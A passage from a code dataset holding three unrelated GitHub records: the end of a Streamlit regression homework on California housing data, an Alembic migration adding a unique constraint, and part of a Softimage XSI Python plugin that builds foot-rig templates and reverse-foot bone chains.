\")\nst.latex( r\"\\qquad \\qquad \\qquad \\qquad \\qquad \\qquad \\qquad \\qquad \\qquad \\Delta B_1 + = -2 * (y_i - \\hat{y}_i) * x_i \")\nst.latex( r\"\\qquad \\qquad \\qquad \\Delta B_1 = \\frac {\\Delta B_1}{N} + 2 * \\lambda * \\beta_1 \")\nst.latex( r\"\\qquad \\qquad \\qquad \\Delta B_0 = \\frac {\\Delta B_0}{N} + 2 * \\lambda * \\beta_0 \")\n\n\n\nst.header(\"Dataset\")\n\n# fetch the data\ncal_housing = fetch_california_housing()\ndf = pd.DataFrame(cal_housing.data, columns=cal_housing.feature_names)\nHouseAgeGroup= (df['HouseAge'].values / 10).astype(np.int)\n\n#clear not related features\ndf = pd.DataFrame(dict(MedInc=df['MedInc'], price=cal_housing.target))\n\n# if it is required, normalize the data\n# for that case , normalization does not work well\n#df=normalize(df) \n\n\nx,y= np.array(df[\"MedInc\"]),np.array(df[\"price\"])\nst.dataframe(df)\n\nst.subheader(\"Correlation\")\n## correlation between income and house price is 0.68\nr = np.corrcoef(x, y)\n\nst.write(f\"Correlation between Income and House Price is : { r[0][1] } \")\n\n\n#split the data set to train and test\nX_train, X_test, y_train, y_test = train_test_split( x, y, test_size=0.33, random_state=42)\n\n\np = st.slider(\"Mixture Ration (p)\", 0.0, 1.0, value=0.8)\nbeta, gamma = reg(X_train,y_train,HouseAgeGroup,\n p=p,\n verbose=False)\n\nst.subheader(f\"General Model with p={p:.2f} contribution\")\nst.latex(fr\"Price = {beta[1]:.4f} \\times MedInc + {beta[0]:.4f}\")\n\n\nst.header(\"Performance metrics for general model \")\n\nst.header(\"Train performance\")\nperformance(beta, X_train, y_train)\n\nst.header(\"Test Performance\")\nperformance(beta, X_test, y_test)\n\nst.header(\"Performance Metrics for Modified Model \")\n\nteta = st.slider(\"Teta Value\", 0.0, 1.0, value=0.4)\n\nst.header(\"Train performance\")\n#apply simple linear regression (L2 regularize)\nw = modifiedModel(X_train,y_train,teta)\nperformance(w, X_train, y_train)\n\nst.header(\"Test performance\")\nperformance(w, X_test, y_test)\n\n","repo_name":"hakyuz16/TrendyolBootCamp","sub_path":"hw1.py","file_name":"hw1.py","file_ext":"py","file_size_in_byte":7982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74933280809","text":"\"\"\"role is changed\n\nRevision ID: 001b9c19353c\nRevises: bf6775dba4fc\nCreate Date: 2022-08-30 17:24:38.668534\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '001b9c19353c'\ndown_revision = 'bf6775dba4fc'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_unique_constraint(None, 'user_roles', ['name'])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'user_roles', type_='unique')\n # ### end Alembic commands ###\n","repo_name":"bakhtiyorovdilshod/shtatka","sub_path":"migrations/versions/001b9c19353c_role_is_changed.py","file_name":"001b9c19353c_role_is_changed.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"12141023114","text":"\"\"\"\r\nzFoot.py\r\n\r\nCreated by andy on 2008-07-22.\r\nCopyright (c) 2008 Zoogloo LLC. All rights reserved.\r\n\"\"\"\r\n\r\n__version__ = '$Revision: 214 $'\r\n__author__ = '$Author: andy $'\r\n__date__ = '$Date: 2009-12-30 00:36 -0800 $'\r\n\r\nimport win32com.client\r\nimport win32com.server\r\nfrom win32com.client import constants\r\nfrom win32com.client import constants as c\r\nfrom win32com.client.dynamic import Dispatch as dispatch\r\nimport re\r\n\r\nxsi = Application\r\nlog = xsi.logmessage\r\n\r\nnull = None\r\nfalse = 0\r\ntrue = 1\r\n\r\ndef XSILoadPlugin(in_reg):\r\n\tin_reg.Author = \"Andy Buecker\"\r\n\tin_reg.Name = \"zFoot\"\r\n\tin_reg.Email = \"andy@zoogloo.net\"\r\n\tin_reg.URL = \"\"\r\n\tin_reg.Major = 1\r\n\tin_reg.Minor = 1\r\n\r\n\t# in_reg.RegisterProperty('zFoot')\r\n\r\n\tin_reg.RegisterCommand('zFoot', 'zFoot')\r\n\r\n\t# in_reg.RegisterMenu(c.siMenuTbAnimateActionsStoreID, 'zFootMenu', False)\r\n\t\r\n\t# copyright message #\r\n\tmsg = '''\r\n#------------------------------------------#\r\n %s (v.%d.%d)\r\n Copyright 2008 Zoogloo LLC.\r\n All rights Reserved.\r\n#------------------------------------------#\r\n\t''' % (in_reg.Name, in_reg.Major, in_reg.Minor)\r\n\tlog(msg)\r\n\r\n\treturn true\r\n\r\ndef XSIUnloadPlugin(in_reg):\r\n\tstrPluginName = in_reg.Name\r\n\tApplication.LogMessage(str(strPluginName) + str(\" has been unloaded.\"))\r\n\treturn true\r\n\r\n\r\n#-----------------------------------------------------------------------------\r\n# Commands\r\n#-----------------------------------------------------------------------------\r\ndef zFoot_Init(ctxt):\r\n\toCmd = ctxt.Source\r\n\toCmd.Description = \"\"\r\n\t#oCmd.SetFlag(constants.siNoLogging,false)\r\n\r\n\toArgs = oCmd.Arguments\r\n\toArgs.Add('symmetry', c.siArgumentInput, 'left', c.siString)\r\n\t#oArgs.AddObjectArgument('model')\r\n\r\n\treturn True\r\n\r\ndef zFoot_Execute(symmetry):\r\n\t# export the python object #\r\n\timport win32com.server\r\n\treturn win32com.server.util.wrap(\r\n\t\tzFoot(symmetry)\r\n\t)\r\n\t\r\n\t\r\n#-----------------------------------------------------------------------------\r\n# Classes\r\n#-----------------------------------------------------------------------------\r\n\t\r\ndef zProp(function):\r\n\t'''\r\n\tEasy function decorator for accessing properties.\r\n\t\r\n\tUsage:\r\n\t\r\n\t>>> @zProp\r\n\t>>> def Connection():\r\n\t>>> \t\\'''connection\\'''\r\n\t>>> \tdef fget(self):\r\n\t>>> \t\treturn self._cnx\r\n\t>>>\t\tdef fset(self, value):\r\n\t>>>\t\t\tself._cnx = value\r\n\t>>>\t\tdef fdel(self):\r\n\t>>>\t\t\traise Exception, \"Can't delete attribute 'Connection'\"\r\n\t>>> \treturn locals()\r\n\t\r\n\t'''\r\n\treturn property(doc=function.__doc__, **function())\r\n\r\nclass zFoot(object):\r\n\r\n\t# required for COM wrapper #\r\n\t_public_methods_ = [\r\n\t]\r\n\t# define the output vars here #\r\n\t_public_attrs_ = [\r\n\t\t'rig',\r\n\t\t'template',\r\n\t\t'scale',\r\n\t\t'symmetry',\r\n\t]\r\n\t# define those attrs that are read only #\r\n\t_readonly_attrs_ = [\r\n\t\t'rig',\r\n\t\t'template',\r\n\t]\r\n\r\n\t# set the class variables #\r\n\tuid\t\t\t\t= '5c4088413d078fb6a7f703b35a9a5dc7'\r\n\t\r\n\tdef __init__(self, symmetry='left'):\r\n\t\tsuper(zFoot, self).__init__()\r\n\t\t\r\n\t\t# reset the instance varaibles #\r\n\t\tself._template \t\t= None\r\n\t\tself._rig\t\t \t= None\r\n\t\t\r\n\t\tself.basename\t\t= 'Foot'\r\n\t\tself.scale\t\t\t= 1\r\n\t\tself.symmetry\t\t= symmetry\r\n\t\r\n\t@zProp\r\n\tdef template():\r\n\t\t'''Template Accessor'''\r\n\t\tdef fget(self):\r\n\t\t\t# create a template if it doesn't exist #\r\n\t\t\tif not self._template:\r\n\t\t\t\t# wrap a new class #\r\n\t\t\t\tself._template = dispatch(win32com.server.util.wrap(zFoot_Template(self)))\r\n\t\t\treturn self._template\r\n\t\tdef fset(self, value):\r\n\t\t\traise Exception('Unable to modify template value')\r\n\t\tfdel = fset\r\n\t\treturn locals()\r\n\t\t\r\n\t@zProp\r\n\tdef rig():\r\n\t\t'''Rig accessor'''\r\n\t\tdef fget(self):\r\n\t\t\t# create a rig class if it doesn't exist #\r\n\t\t\tif not self._rig:\r\n\t\t\t\t# wrap a new class #\r\n\t\t\t\tself._rig = dispatch(win32com.server.util.wrap(zFoot_Rig(self)))\r\n\t\t\t# return the private var #\r\n\t\t\treturn self._rig\r\n\t\tdef fset(self, value):\r\n\t\t\traise Exception('Unable to modify rig value.')\r\n\t\tfdel = fset\r\n\t\treturn locals()\r\n\t\t\t\r\n\t\t\t\t\r\nclass zFoot_Template(object):\r\n\t\"\"\"docstring for zFoot_Template\"\"\"\r\n\t# required for COM wrapper #\r\n\t_public_methods_ = [\r\n\t\t'Draw',\r\n\t\t'LoadDefaultValues',\r\n\t\t'GetFromScene',\r\n\t]\r\n\t# define the output vars here #\r\n\t_public_attrs_ = [\r\n\t\t'parent',\r\n\t\t'model',\r\n\t\t\r\n\t\t'v_ankle',\r\n\t\t'v_heel',\r\n\t\t'v_ball',\r\n\t\t'v_toe',\r\n\t] \r\n\t# defv_toe ine those attrs that are read only #\r\n\t_readonly_attrs_ = [\r\n\t\t'parent'\r\n\t]\r\n\r\n\tdef __init__(self, parent):\r\n\t\tsuper(zFoot_Template, self).__init__()\r\n\t\t\r\n\t\t# set the instance variables #\r\n\t\tself.parent\t\t= parent\r\n\t\tself.model \t\t= None\r\n\t\t\r\n\t\t# load the default values #\r\n\t\tself.LoadDefaultValues()\r\n\t\r\n\tdef LoadDefaultValues(self):\r\n\t\t\"\"\"Sets the default values for the template\"\"\"\r\n\t\tself.v_ankle\t= XSIMath.CreateVector3(2.580, 3.454, 0.216)\r\n\t\tself.v_ball \t= XSIMath.CreateVector3(3.290, 0.986, 2.343)\r\n\t\tself.v_toe \t= XSIMath.CreateVector3(4.063, 0.495, 4.761)\r\n\t\tself.v_heel\t\t= XSIMath.CreateVector3(2.052, 0.454, -1.739)\r\n\t\tif re.match(r'^right$', self.parent.symmetry, re.I): # right #\r\n\t\t\tself.v_ankle.X\t*= -1\r\n\t\t\tself.v_ball.X \t*= -1\r\n\t\t\tself.v_toe.X \t*= -1\r\n\t\t\tself.v_heel.X\t*= -1\r\n\r\n\t\t# set the default model #\r\n\t\tself.model = xsi.ActiveSceneRoot\r\n\t\t\t\r\n\tdef Draw(self):\r\n\t\t\"\"\"docstring for Draw\"\"\"\r\n\t\t\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# get the model #\r\n\t\tif not self.model:\r\n\t\t\traise Exception('Model attribute for template not specified.')\r\n\t\t\r\n\t\t# dispatch the model #\r\n\t\tself.model = dispatch(self.model)\r\n\t\t\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# create a node to hold the template #\r\n\t\tnode_parent = self.model.AddNull('Foot_%s_Container' % self.parent.symmetry[0].upper())\r\n\t\tnode_parent.primary_icon.Value = 0\r\n\t\tnode_parent.Properties('Visibility').Parameters('viewvis').Value = False\r\n\t\tnode_parent.Properties('Visibility').Parameters('rendvis').Value = False\r\n\t\tnode_parent.AddProperty('CustomProperty', False, 'zBuilderTemplateItem')\r\n\t\tprop = node_parent.AddProperty('CustomProperty', False, 'zContainer')\r\n\t\tprop = dispatch(prop)\r\n\t\tprop.AddParameter3('ContainerName', c.siString, 'Foot')\r\n\t\tprop.AddParameter3('ContainerSym', c.siString, self.parent.symmetry)\r\n\t\tprop.AddParameter3('ContainerUID', c.siString, self.parent.uid)\r\n\t\t\r\n\t\t# draw the nodes #\r\n\t\tnode_ankle \t= node_parent.AddNull(xsi.zMapName('FootAnkle', 'Custom:Tmp', self.parent.symmetry))\r\n\t\tnode_ball \t= node_parent.AddNull(xsi.zMapName('FootBall', 'Custom:Tmp', self.parent.symmetry))\r\n\t\tnode_toe \t= node_parent.AddNull(xsi.zMapName('FootToe', 'Custom:Tmp', self.parent.symmetry))\r\n\t\tnode_heel \t= node_parent.AddNull(xsi.zMapName('FootHeel', 'Custom:Tmp', self.parent.symmetry))\r\n\t\t\r\n\t\t# tag the nodes #\r\n\t\tnode_ankle.AddProperty('CustomProperty', False, 'zBuilderTemplateManip')\r\n\t\tnode_ankle.AddProperty('CustomProperty', False, 'zFootAnkle')\r\n\t\t\r\n\t\tnode_ball.AddProperty('CustomProperty', False, 'zBuilderTemplateManip')\r\n\t\tnode_ball.AddProperty('CustomProperty', False, 'zFootBall')\r\n\t\t\r\n\t\tnode_toe.AddProperty('CustomProperty', False, 'zBuilderTemplateManip')\r\n\t\tnode_toe.AddProperty('CustomProperty', False, 'zFootToe')\r\n\t\t\r\n\t\tnode_heel.AddProperty('CustomProperty', False, 'zBuilderTemplateManip')\r\n\t\tnode_heel.AddProperty('CustomProperty', False, 'zFootHeel')\r\n\t\t\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# set the positions #\r\n\t\ttrans = XSIMath.CreateTransform()\r\n\t\tv_result = XSIMath.CreateVector3()\r\n\t\t\r\n\t\t# ankle #\r\n\t\tv_result.Scale(self.parent.scale, self.v_ankle)\r\n\t\ttrans.Translation = v_result\r\n\t\tnode_ankle.Kinematics.Global.Transform = trans\r\n\t\t\r\n\t\t# ball #\r\n\t\tv_result.Scale(self.parent.scale, self.v_ball)\r\n\t\ttrans.Translation = v_result\r\n\t\tnode_ball.Kinematics.Global.Transform = trans\r\n\t\t\r\n\t\t# toe #\r\n\t\tv_result.Scale(self.parent.scale, self.v_toe)\r\n\t\ttrans.Translation = v_result\r\n\t\tnode_toe.Kinematics.Global.Transform = trans\r\n\t\t\r\n\t\t# heel #\r\n\t\tv_result.Scale(self.parent.scale, self.v_heel)\r\n\t\ttrans.Translation = v_result\r\n\t\tnode_heel.Kinematics.Global.Transform = trans\r\n\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# add a visual upvector #\r\n\t\tnode_upv\t\t\t\t\t\t= node_parent.AddNull(xsi.zMapName('%sUpv' % self.parent.basename, 'Custom:Tmp', self.parent.symmetry))\r\n\t\tnode_upv.primary_icon.Value \t= 0\r\n\t\tnode_upv.shadow_icon.Value \t= 10\r\n\t\tnode_upv.size.Value\t\t\t\t= 1\r\n\t\tnode_upv.shadow_offsetZ.Value\t= node_upv.size.Value\r\n\t\t\r\n\t\tnode_upv.shadow_colour_custom\t= True\r\n\t\tnode_upv.R.Value\t\t\t\t= 1\r\n\t\tnode_upv.G.Value\t\t\t\t= 0.8\r\n\t\tnode_upv.B.Value\t\t\t\t= 1\r\n\t\t\r\n\t\tcns_upv\t\t\t\t\t\t\t= node_upv.Kinematics.AddConstraint('Direction', node_toe, False)\r\n\t\tcns_upv\t\t\t\t\t\t\t= dispatch(cns_upv)\r\n\t\tcns_upv.upvct_active.Value \t\t= True\r\n\t\tcns_upv.UpVectorReference\t\t= node_ankle\r\n\t\tcns_upv.dirx\t\t\t\t\t= 0\r\n\t\tcns_upv.diry\t\t\t\t\t= 0\r\n\t\tcns_upv.dirz\t\t\t\t\t= 1\r\n\t\tcns_upv.upx\t\t\t\t\t\t= 1\r\n\t\tcns_upv.upy\t\t\t\t\t\t= 0\r\n\t\tcns_upv.upz\t\t\t\t\t\t= 0\r\n\t\t\r\n\t\tcns_pos\t\t\t\t\t\t\t= node_upv.Kinematics.AddConstraint('Position', node_heel, False)\r\n\t\t\r\n\t\tnode_upv.Size.AddExpression(\r\n\t\t\t'ctr_dist( %s.kine.global, %s.kine.global ) / 2' % (\r\n\t\t\t\tnode_heel.FullName, node_toe.FullName\r\n\t\t\t)\r\n\t\t)\r\n\t\t\r\n\tdef GetFromScene(self):\r\n\t\t\"\"\"Gets the template values from the template model\"\"\"\r\n\t\t\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# make sure the model exists \r\n\t\tif not self.model:\r\n\t\t\traise Exception('Model attribute for template not specified.')\r\n\t\t\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# find the container #\r\n\t\tnode_parent = None\r\n\t\tfor node in dispatch(self.model).FindChildren('*'):\r\n\t\t\tif node.Properties('zContainer'):\r\n\t\t\t\tif node.Properties('zContainer').Parameters('ContainerUID').Value == self.parent.uid \\\r\n\t\t\t\tand node.Properties('zContainer').Parameters('ContainerSym').Value == self.parent.symmetry:\r\n\t\t\t\t\tnode_parent = node\r\n\t\t\t\t\tbreak\r\n\t\t# make sure we have the container #\r\n\t\tif not node_parent:\r\n\t\t\traise Exception('Unable to find leg template container by id: %s' % self.parent.uid)\r\n\t\t\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# get all the nodes under the container #\r\n\t\tchild_nodes = node_parent.FindChildren('*')\r\n\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# get the vectors #\r\n\t\tset_zFootAnkle\t= False\r\n\t\tset_zFootBall\t= False\r\n\t\tset_zFootToe\t= False\r\n\t\tset_zFootHeel\t= False\r\n\t\tfor node in child_nodes:\r\n\t\t\tif node.Properties('zFootAnkle'):\r\n\t\t\t\tself.v_ankle \t= node.Kinematics.Global.Transform.Translation\r\n\t\t\t\tset_zFootAnkle\t= True\r\n\t\t\telif node.Properties('zFootBall'):\r\n\t\t\t\tself.v_ball \t= node.Kinematics.Global.Transform.Translation\r\n\t\t\t\tset_zFootBall\t= True\r\n\t\t\telif node.Properties('zFootToe'):\r\n\t\t\t\tself.v_toe \t\t= node.Kinematics.Global.Transform.Translation\r\n\t\t\t\tset_zFootToe\t= True\r\n\t\t\telif node.Properties('zFootHeel'):\r\n\t\t\t\tself.v_heel\t\t= node.Kinematics.Global.Transform.Translation\r\n\t\t\t\tset_zFootHeel\t= True\r\n\r\n\t\t# see if all the variables are set #\t\t\r\n\t\tfor varname in locals().keys():\r\n\t\t\tif re.match(r'^set_.+', varname):\r\n\t\t\t\tif not locals().get(varname):\r\n\t\t\t\t\traise Exception(\r\n\t\t\t\t\t\t'Unable to set \"%s\" template value from scene.' % varname\r\n\t\t\t\t\t)\r\n\t\t\r\nclass zFoot_Rig(object):\r\n\t\"\"\"\r\n\tClass for drawing a Foot.\r\n\t\"\"\"\r\n\t# required for COM wrapper #\r\n\t_public_methods_ = [\r\n\t\t'Build',\r\n\t]\r\n\t# define the output vars here #\r\n\t_public_attrs_ = [\r\n\t\t# ins #\r\n\t\t'parent',\t \r\n\t\t'skeleton_parent',\r\n\t\t'controls_parent',\r\n\t\t'deformer_parent',\r\n\t\t'node_pelvis',\t \r\n\t\t'character_set',\t \r\n\t 'con_foot',\t \r\n\t 'con_ankle',\t \r\n\t 'ik_switch',\t \r\n\t 'prop_anim',\t \r\n\t 'prop_anim_di', \r\n\t 'root_leg_con', \r\n\t 'root_skel_leg', \r\n\t\t'size_ball_con',\t\t\r\n\t\t'size_toe_con',\t\t\r\n\t\t'size_toe_pivot_con',\t\r\n\t\t'size_ball_pivot_con',\r\n\t\t'size_fk_cons',\t\r\n\t\t'group_deformers',\t\r\n\t\t'group_controls',\t\r\n\t\t'realign_foot_con',\r\n\t\t'add_middlers',\r\n\r\n\t\t# outs #\r\n\t\t'deformers',\r\n\t\t'character_subset',\r\n\t\t'root_foot',\r\n\t\t'root_foot_rev',\r\n\t\t'con_foot_fk',\r\n\t\t'con_toe',\r\n\t\t'con_toe_fk',\r\n\t\t'con_toe_pivot',\r\n\t\t'con_ball_pivot',\r\n\t\t'con_ball',\r\n\t\t'env_toe',\r\n\t\t'env_foot',\r\n\t]\r\n\t# define those attrs that are read only #\r\n\t_readonly_attrs_ = [\r\n\t\t'parent',\r\n\t\t# outs #\r\n\t\t'deformers',\r\n\t\t'character_subset',\r\n\t\t'root_foot',\r\n\t\t'root_foot_rev',\r\n\t\t'con_foot_fk',\r\n\t\t'con_toe',\r\n\t\t'con_toe_fk',\r\n\t\t'con_toe_pivot',\r\n\t\t'con_ball_pivot',\r\n\t\t'con_ball',\r\n\t\t'env_toe',\r\n\t\t'env_foot',\r\n\t]\r\n\r\n\tdef __init__(self, parent):\r\n\t\tsuper(zFoot_Rig, self).__init__()\r\n\r\n\t\t# set the instance variables #\r\n\t\tself.parent\t\t\t\t\t= parent\r\n\t\tself.skeleton_parent \t\t= None\r\n\t\tself.controls_parent \t\t= None\r\n\t\tself.deformer_parent \t\t= None\r\n\t\tself.character_set\t\t\t= None\r\n\t\tself.con_foot \t= None\r\n\t\tself.con_ankle\t \t\t\t= None\r\n\t\tself.ik_switch \t= None\r\n\t\tself.prop_anim \t= None\r\n\t\tself.prop_anim_di \t= None\r\n\t\tself.root_leg_con \t= None\r\n\t\tself.root_skel_leg \t= None\r\n\t\tself.group_deformers\t\t= None\r\n\t\tself.group_controls\t\t\t= None\r\n\t\tself.realign_foot_con\t\t= True\r\n\t\tself.add_middlers\t\t\t= False\r\n\t\t\r\n\t\tself.size_ball_con\t\t\t= 1\r\n\t\tself.size_toe_con\t\t\t= 1\r\n\t\tself.size_toe_pivot_con\t\t= 1\r\n\t\tself.size_ball_pivot_con\t= 1\r\n\t\tself.size_fk_cons\t\t\t= 1.75\r\n\t\t\r\n\t\t# outputs #\r\n\t\tself.character_subset\t\t= None\r\n\t\tself.root_foot_rev\t\t\t= None\r\n\t\tself.root_foot\t\t\t\t= None\r\n\t\tself.deformers\t\t\t\t= dispatch('XSI.Collection')\r\n\t\t\r\n\t# override the attribute setter to dispatch objects when setting #\r\n\tdef __setattr__(self, name, value):\r\n\t\t# if the name is in the inputs...#\r\n\t\tif name in self._public_attrs_:\r\n\t\t\t# ... dispatch the value (if we can)#\r\n\t\t\ttry:\r\n\t\t\t\tself.__dict__[name] = dispatch(value)\r\n\t\t\texcept:\r\n\t\t\t\tself.__dict__[name] = value\r\n\t\telse:\r\n\t\t\traise Exception('Unable to locate public attribute \"%s\"' % (name))\r\n\t\t\t\r\n\tdef Build(self):\r\n\t\t\"\"\"Builds the rig from the template values\"\"\"\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# pre conditions\r\n\t\t\r\n\t\t# make sure we have the skeleton_parent #\r\n\t\tif not self.skeleton_parent:\r\n\t\t\traise Exception(\r\n\t\t\t\t'zFoot.rig.skeleton_parent is not defined.'\r\n\t\t\t)\r\n\t\tself.skeleton_parent = dispatch(self.skeleton_parent)\r\n\t\t\r\n\t\t# make sure we have the controls_parent #\r\n\t\tif not self.controls_parent:\r\n\t\t\traise Exception(\r\n\t\t\t\t'zFoot.rig.controls_parent is not defined.'\r\n\t\t\t)\r\n\t\tself.controls_parent = dispatch(self.controls_parent)\r\n\t\t\r\n\t\t# make sure we have the deformer_parent #\r\n\t\tif not self.deformer_parent:\r\n\t\t\traise Exception(\r\n\t\t\t\t'zFoot.rig.deformer_parent is not defined.'\r\n\t\t\t)\r\n\t\tself.deformer_parent = dispatch(self.deformer_parent)\r\n\t\t\r\n\t\t# make sure we have the template values #\r\n\t\ttemplate = self.parent.template\r\n\t\t\t\r\n\t\t# make sure we have all items needed from the leg #\r\n\t\tif not self.con_foot:\r\n\t\t\traise Exception(\r\n\t\t\t\t'Missing reference to a foot controller.'\r\n\t\t\t)\r\n\t\tif not self.con_ankle:\r\n\t\t\traise Exception(\r\n\t\t\t\t'Missing reference to leg ankle controller.'\r\n\t\t\t)\r\n\t\tif not self.ik_switch:\r\n\t\t\traise Exception(\r\n\t\t\t\t'Missing reference to a leg ik switch.'\r\n\t\t\t)\r\n\t\tif not self.prop_anim:\r\n\t\t\traise Exception(\r\n\t\t\t\t'Missing reference to a leg animation property.'\r\n\t\t\t)\r\n\t\tif not self.prop_anim_di:\r\n\t\t\traise Exception(\r\n\t\t\t\t'Missing reference to a leg animation property (display info).'\r\n\t\t\t)\r\n\t\tif not self.root_leg_con:\r\n\t\t\traise Exception(\r\n\t\t\t\t'Missing reference to a leg controller root.'\r\n\t\t\t)\r\n\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# create a null to locate the foot orientation \r\n\t\tself.con_foot = dispatch(self.con_foot)\r\n\t\tnode_temp = xsi.ActiveSceneRoot.AddNull()\r\n\t\tnode_temp.Kinematics.Global.Transform = self.con_foot.node_rest.Kinematics.Global.Transform\r\n\t\t\r\n\t\t# get the global vector #\r\n\t\tv_temp_global = node_temp.Kinematics.Global.Transform.Translation\r\n\t\t\r\n\t\t# create a vector at the toe #\r\n\t\tnode_temp_toe = xsi.ActiveSceneRoot.AddNull()\r\n\t\ttrans = XSIMath.CreateTransform()\r\n\r\n\t\t# match the global y vector #\r\n\t\tv_toe_flat = XSIMath.CreateVector3()\r\n\t\tv_toe_flat.Copy(self.parent.template.v_toe)\r\n\t\tv_toe_flat.Y = v_temp_global.Y\r\n\t\ttrans.Translation = v_toe_flat\r\n\t\tnode_temp_toe.Kinematics.Global.Transform = trans\r\n\t\t\r\n\t\t# aim the temp foot at the toe with a world up #\r\n\t\tcns = node_temp.Kinematics.AddConstraint('Direction', node_temp_toe, False)\r\n\t\tcns = dispatch(cns)\r\n\t\tcns.upvct_active.Value = True\r\n\r\n\t\t# set the foot rest con to this transform #\r\n\t\ttrans_foot = node_temp.Kinematics.Global.Transform\r\n\t\tif self.realign_foot_con:\r\n\t\t\tlog('Realigning the foot con to the orientation of the foot.')\r\n\t\t\tself.con_foot.node_rest.Kinematics.Global.Transform = trans_foot \r\n\t\t\r\n\t\t# remove the temp nulls #\r\n\t\txsi.DeleteObj('%s,%s' % (node_temp.FullName, node_temp_toe.FullName))\r\n\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# draw the REVERSE FOOT\r\n\t\r\n\t\t# calculate the plane vector #\r\n\t\tv_plane = XSIMath.CreateVector3()\r\n\t\tv1\t\t= XSIMath.CreateVector3()\r\n\t\tv2\t\t= XSIMath.CreateVector3()\r\n\t\t# get vector from root to ankle #\r\n\t\tv1.Sub(template.v_heel, template.v_ankle)\r\n\t\t# get vector from root to knee #\r\n\t\tv2.Sub(template.v_heel, template.v_toe)\r\n\t\t# get the cross product #\r\n\t\tv_plane.Cross(v1, v2)\r\n\t\r\n\t\t# draw the chain #\r\n\t\tself.root_foot_rev = self.controls_parent.Add2DChain(\r\n\t\t\ttemplate.v_heel, \r\n\t\t\ttemplate.v_toe, \r\n\t\t\tv_plane, \r\n\t\t\tc.si2DChainNormalRadian,\r\n\t\t\txsi.zMapName('footRev', 'ChainRoot', self.parent.symmetry)\r\n\t\t)\r\n\t\tself.root_foot_rev.Effector.Name = xsi.zMapName('footRev', 'ChainEff', self.parent.symmetry)\r\n\t\tself.root_foot_rev.Bones(0).Name = xsi.zMapName('footRev', 'ChainBone', self.parent.symmetry, 1)\r\n\t\t\r\n\t\t# add bones #\r\n\t\tself.root_foot_rev.AddBone(\r\n\t\t\ttemplate.v_ball, \r\n\t\t\tc.siChainBonePin,\r\n\t\t\txsi.zMapName('footRev', 'ChainBone', self.parent.symmetry, 2)\r\n\t\t)\r\n\t\tself.root_foot_rev.AddBone(\r\n\t\t\ttemplate.v_ankle, \r\n\t\t\tc.siChainBonePin,\r\n\t\t\txsi.zMapName('footRev', 'ChainBone', self.parent.symmetry, 3)\r\n\t\t)\r\n\r\n\t\t# format the bones #\r\n\t\tfmt = xsi.zChainFormatter(self.root_foot_rev)\r\n\t\tif re.match(r'^left$', self.parent.symmetry, re.I):\r\n\t\t\tfmt.BoneDisplay = 0\r\n\t\t\tfmt.BoneSize\t= self.parent.scale\r\n\t\t\tfmt.BoneR\t\t= 0\r\n\t\t\tfmt.BoneG\t\t= 1\r\n\t\t\tfmt.BoneB\t\t= 0\r\n\t\t\tfmt.BoneWireR\t= 0\r\n\t\t\tfmt.BoneWireG\t= 1\r\n\t\t\tfmt.BoneWireB\t= 0\r\n\t\t\t\r\n\t\t\tfmt.RootDisplay = 0\r\n\t\t\tfmt.RootSize\t= self.parent.scale\r\n\t\t\tfmt.RootR\t\t= 0\r\n\t\t\tfmt.RootG\t\t= 1\r\n\t\t\tfmt.RootB\t\t= 0\r\n\t\t\tfmt.RootWireR\t= 0\r\n\t\t\tfmt.RootWireG\t= 1\r\n\t\t\tfmt.RootWireB\t= 0\r\n\r\n\t\t\tfmt.EffDisplay \t= 0\r\n\t\t\tfmt.EffSize\t\t= self.parent.scale\r\n\t\t\tfmt.EffR\t\t= 0\r\n\t\t\tfmt.EffG\t\t= 1\r\n\t\t\tfmt.EffB\t\t= 0\r\n\t\t\tfmt.EffWireR\t= 0\r\n\t\t\tfmt.EffWireG\t= 1\r\n\t\t\tfmt.EffWireB\t= 0\r\n\t\t\t\r\n\t\t\tfmt.EffLastBone\t= True\r\n\t\telse: \r\n\t\t\tfmt.BoneDisplay = 0\r\n\t\t\tfmt.BoneSize\t= self.size_fk_cons\r\n\t\t\tfmt.BoneR\t\t= 1\r\n\t\t\tfmt.BoneG\t\t= 0\r\n\t\t\tfmt.BoneB\t\t= 0\r\n\t\t\tfmt.BoneWireR\t= 1\r\n\t\t\tfmt.BoneWireG\t= 0\r\n\t\t\tfmt.BoneWireB\t= 0\r\n\t\t\t\r\n\t\t\tfmt.RootDisplay = 0\r\n\t\t\tfmt.RootSize\t= self.size_fk_cons\r\n\t\t\tfmt.RootR\t\t= 1\r\n\t\t\tfmt.RootG\t\t= 0\r\n\t\t\tfmt.RootB\t\t= 0\r\n\t\t\tfmt.RootWireR\t= 1\r\n\t\t\tfmt.RootWireG\t= 0\r\n\t\t\tfmt.RootWireB\t= 0\r\n\r\n\t\t\tfmt.EffDisplay \t= 0\r\n\t\t\tfmt.EffSize\t\t= self.size_fk_cons\r\n\t\t\tfmt.EffR\t\t= 1\r\n\t\t\tfmt.EffG\t\t= 0\r\n\t\t\tfmt.EffB\t\t= 0\r\n\t\t\tfmt.EffWireR\t= 1\r\n\t\t\tfmt.EffWireG\t= 0\r\n\t\t\tfmt.EffWireB\t= 0\r\n\t\t\t\r\n\t\t\tfmt.EffLastBone\t= True\r\n\r\n\t\tfmt.Format()\r\n\t\t\r\n\t\t#---------------------------------------------------------------------\r\n\t\t# contrain the reverse foot to the controller #\r\n\t\tself.con_foot = dispatch(self.con_foot)\r\n\t\tself.root_foot_rev.Kinematics.AddConstraint('Pose', self.con_foot.node_hook, 